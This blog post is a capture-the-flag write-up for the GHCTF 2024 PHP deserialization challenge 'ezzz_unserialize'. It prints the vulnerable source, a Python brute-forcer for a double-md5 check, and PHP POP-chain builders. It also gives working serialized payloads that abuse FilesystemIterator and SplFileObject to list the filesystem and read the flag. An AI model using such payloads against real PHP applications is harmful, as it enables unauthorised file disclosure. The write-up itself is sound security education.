[GHCTF 2024 新生赛]ezzz_unserialize
我们打开http://node5.anna.nssctf.cn:23442/端口
<?php
/**
* @Author: hey
* @message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.
* Have fun and Good luck!!!
*/
error_reporting(0);
class Sakura{
public $apple;
public $strawberry;
public function __construct($a){
$this -> apple = $a;
}
function __destruct()
{
echo $this -> apple;
}
public function __toString()
{
$new = $this -> strawberry;
return $new();
}
}
class NoNo {
private $peach;
public function __construct($string) {
$this -> peach = $string;
}
public function __get($name) {
$var = $this -> $name;
$var[$name]();
}
}
class BasaraKing{
public $orange;
public $cherry;
public $arg1;
public function __call($arg1,$arg2){
$function = $this -> orange;
return $function();
}
public function __get($arg1)
{
$this -> cherry -> ll2('b2');
}
}
class UkyoTachibana{
public $banana;
public $mangosteen;
public function __toString()
{
$long = @$this -> banana -> add();
return $long;
}
public function __set($arg1,$arg2)
{
if($this -> mangosteen -> tt2)
{
echo "Sakura was the best!!!";
}
}
}
class E{
public $e;
public function __get($arg1){
array_walk($this, function ($Monday, $Tuesday) {
$Wednesday = new $Tuesday($Monday);
foreach($Wednesday as $Thursday){
echo ($Thursday.'<br>');
}
});
}
}
class UesugiErii{
protected $coconut;
protected function addMe() {
return "My time with Sakura was my happiest time".$this -> coconut;
}
public function __call($func, $args) {
call_user_func([$this, $func."Me"], $args);
}
}
class Heraclqs{
public $grape;
public $blueberry;
public function __invoke(){
if(md5(md5($this -> blueberry)) == 123) {
return $this -> grape -> hey;
}
}
}
class MaiSakatoku{
public $Carambola;
private $Kiwifruit;
public function __set($name, $value)
{
$this -> $name = $value;
if ($this -> Kiwifruit = "Sakura"){
strtolower($this-> Carambola);
}
}
}
if(isset($_POST['GHCTF'])) {
unserialize($_POST['GHCTF']);
} else {
highlight_file(__FILE__);
}首先我们可以先确定关键点就是在于:
class A{
public $a;
public function __get($arg1){
array_walk($this, function ($Monday, $Tuesday) {
$Wednesday = new $Tuesday($Monday);
foreach($Wednesday as $Thursday){
echo ($Thursday.'<br>');
}
});
}
}array_walk函数的用法:使用用户自定义函数对数组中的每个元素做回调处理
<?php
function myfunc($value,$key){
echo $key;
echo $value;
}
$a = array("a"=>"two","b"=>"one");
array_walk($a,"myfunc");根据上面的代码,我们就可以理解为:第一个参数是参数数组,第二个参数就是用户自定义的函数
而此题目的代码,很明显第一个参数是$this,这是代表将当前的E类当作参数数组传给后面的匿名函数
匿名函数里面接收了两个参数一个$Monday,一个$Tuesday
分别对应着E类里面的属性和属性的值
之后通过这行代码$Wednesday = new $Tuesday($Monday);,我们可以知晓用原生类做操作
原生类输出的内容还必须是可迭代的数组
<?php
error_reporting(0);
class E{
public $e;
public function print(){
array_walk($this, function ($Monday, $Tuesday) {
echo "Monday => ".$Monday." | ";
echo "Tuesday => ".$Tuesday." | ";
// $Wednesday = new $Tuesday($Monday);
foreach($Wednesday as $Thursday){
echo ($Thursday.'<br>');
}
});
}
}
$a = new E();
$a->e = "123";
$a->aaaa = "321";
$a->print();
Monday => 123 | Tuesday => e | Monday => 321 | Tuesday => aaaa |接下来我们就要去寻找pop链
E::__get -> Heraclqs::__invoke -> Sakura::__toString -> Sakura::__destruct我们注意到:
class Heraclqs{
public $grape;
public $blueberry;
public function __invoke(){
if(md5(md5($this -> blueberry)) == 123) {
return $this -> grape -> hey;
}
}
}我们需要爆破出双md5加密后,前三个字符为123,紧接着就是字母:
import hashlib
import itertools
import string
for i in itertools.product(string.printable, repeat=3):
s = ''.join(i)
s1 = hashlib.md5(s.encode()).hexdigest()
s2 = hashlib.md5(s1.encode()).hexdigest()
if s2[:3] == '123':
print(s)0j=
1xE
1IL
2tL
2'T
2,p
2[V
2][
2
7
3lD
3FS
4rJ
4Cs
5nb
5v\
6:t
6^~
78=
7Rs
8s[
8UF
8WL
8(i
9p*
9*_
9:+
9;f
9=-
9
p
aq6
aGX
aW8
a$C
bc!
c?b
dg>
dDk
dQ'
dY1
esW
f0w
f5
fpr
gt4
g'h
g,b
hbh
ho?
i2x
i54
jA4
jDX
k8j
k9<
kq
l4c
lV
l&O
msj
mXS
nvb
ouK
pJ(
q:{
r#=
r:b
sg2
sT!
s:^
txI
t*E
ugy
ukb
un
uo=
uAz
u+O
v94
va{
vlJ
w6
w<J
x3Q
x6c
xFt
yxM
za4
z%3
Al
Ap
AS
A?a
Bem
Bp7
BsC
BR8
B)z
B]V
CgK
Cit
DaW
DwA
D+T
E4c
E4.
E&c
E^|
F1J
Fh!
FW^
Ghy
GJN
GOq
G#M
G
N
HlN
Iyf
IRM
IVx
I%k
I{p
I{W
J%,
K2
KLA
K#
LLh
Mj%
Mm5
Mu\
ML%
N'6
OgK
OB+
OL[
P2.
Q2X
QqP
QuW
Rz\
UB*
UNq
U#Y
V0E
V8*
W6^
X02
XGd
X=L
YA_
YEx
Z6z
Z'g
!1U
!-%
"cW
"wS
"G&
#qr
#Nm
#<d
$l;
$I0
%(m
%:x
%[$
%
,
&14
&:f
'qK
'Q6
(5h
)F^
)>a
)^%
*<J
+h
+M=
,26
,{
-~}
.gx
.oK
."
/n/
/z3
:3'
:7r
:r;
:Ae
:#t
;d(
;uX
;Ux
<dU
<oJ
<Xo
=F:
=(M
=,0
>27
>sZ
>?v'
>?`-
>@w-
>[_
\4N
\N<
]kM
^fr
_o&
_Ze
`y;
`Gj
`]8
{SC
|q:
|ty
}g8
}Xx
}*3
}+R
~tV
~DP
~Sd
~U
~=q
~
4
~
h
.
'I
$5
m
Y8
>q
Qy
'!
{D<?php
class Sakura{
public $apple;
public $strawberry;
}
class E{
public $e;
}
class Heraclqs{
public $grape;
public $blueberry;
}
$s = new Sakura;
$s->apple = new Sakura;
$s->apple->strawberry = new Heraclqs;
$s->apple->strawberry->blueberry = "2tL";
$s->apple->strawberry->grape = new E;
$s->apple->strawberry->grape->FilesystemIterator = "/";
echo serialize($s);
?>POST
GHCTF=O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:18:"FilesystemIterator";s:1:"/";}s:9:"blueberry";s:3:"2tL";}}s:10:"strawberry";N;}//sys
//etc
//proc
//var
//bin
//srv
//lib
//mnt
//sbin
//tmp
//dev
//usr
//media
//root
//run
//home
//1_ffffffflllllagggggg
//.dockerenv<?php
class Sakura{
public $apple;
public $strawberry;
}
class NoNo {
private $peach;
}
class BasaraKing{
public $orange;
public $cherry;
public $arg1;
}
class UkyoTachibana{
public $banana;
public $mangosteen;
}
class E{
public $e;
}
class UesugiErii{
protected $coconut;
}
class Heraclqs{
public $grape;
public $blueberry;
}
class MaiSakatoku{
public $Carambola;
private $Kiwifruit;
}
$s = new Sakura;
$s->apple = new Sakura;
$s->apple->strawberry = new Heraclqs;
$s->apple->strawberry->blueberry = "2tL";
$s->apple->strawberry->grape = new E;
$s->apple->strawberry->grape->SplFileObject = "/1_ffffffflllllagggggg";
echo serialize($s);
?>GHCTF=O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:13:"SplFileObject";s:22:"/1_ffffffflllllagggggg";}s:9:"blueberry";s:3:"2tL";}}s:10:"strawberry";N;}NSSCTF{ac413365-ccee-41f5-9c88-1e01ca56b897}
- タイトル: [GHCTF 2024 新生赛]ezzz_unserialize
- 作者: Rxw
- で作成されました : 2024-08-11 18:28:48
- で更新されました : 2024-11-11 19:23:44
- リンク: https://rxw2023-github-io.pages.dev/2024/08/11/GHCTF-2024-新生赛-ezzz-unserialize/
- 著作権宣言: この文章は CC BY-NC-SA 4.0 を使用して許可します。
コメント